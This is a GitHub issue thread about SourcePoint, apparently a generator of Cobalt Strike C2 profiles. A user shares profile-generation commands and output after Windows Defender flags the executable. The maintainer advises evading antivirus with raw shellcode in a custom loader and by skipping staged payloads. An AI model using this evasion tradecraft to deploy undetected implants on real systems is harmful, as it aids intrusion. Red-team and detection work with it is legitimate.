### ISSUE TITLE
Windows 10 Defender

### ISSUE THREAD

**Issue by sec13b** [Tylous/SourcePoint#26]
i use this 2 command :

./SourcePoint -Injector NtMapViewOfSection -Host {SECRET.IP} -Jitter 20 -Outfile teststage2.profile -Stage True -PE_Clone 12 -PostEX_Name 11 -Profile 1 -Useragent Win10Chrome

[*] Preparing Varibles...
[!] Self Signed SSL Cerificate Used
[*] Building Profile...
[!] Host Staging Is Enabled - **Staged Payloads Are Available But Your Beacon Payload Is Available To Anyone That Connects To Your Server To Request It**
[*] Beacon DLL Spoofed To: srvcli.dll
[*] Post-Ex Process Name: mcbuilder.exe
[!] Beacon Shellcode Will Obfuscate Beacon in Memory Prior to Sleeping
[!] ThreadSpooffing in enabled
[!] No Syscall method selected
[*] Seleted Profile: WindowsUpdate
[+] Profile Generated: teststage2.profile
[+] Happy Hacking

./SourcePoint -Outfile out.profile -Host {SECRET.IP} -Injector NtMapViewOfSection
[*] Preparing Varibles...
[*] Building Profile...
[!] Host Staging Is Disabled - **Staged Payloads Are Not Available But Your Beacon Payload Is Not Available To Anyone That Connects**
[*] Beacon DLL Spoofed To: GPSVC.dll
[*] Post-Ex Process Name: pcaui.exe
[!] Beacon Shellcode Will Obfuscate Beacon in Memory Prior to Sleeping
[!] ThreadSpooffing in enabled
[!] No Syscall method selected
[*] Seleted Profile:
[+] Profile Generated: strannik2.profile
[+] Happy Hacking

- **Staged Payloads Are Available But Your Beacon Payload Is Available To Anyone That Connects To Your Server To Request It**   
Is normal?

and the exe is detected

**Comment by Tylous** [comment]
So I'll try to answer your questions to the best of my ability. First, I would never use the standard .exe or .dll. Cobalt strike is a widely C2 framework as such samples of those files have been uploaded to every AV/EDR company. It's recommend to always use the raw shellcode option with a custom loader. Custom loaders have a higher success of then launching the shellcode.

Second,to your comment about staged shellcode, I typically don't run with that option because staged shellcode is a huge IOC (because you can't customize the method of communication for the second stage, so everyone who runs staged is doing the same thing).
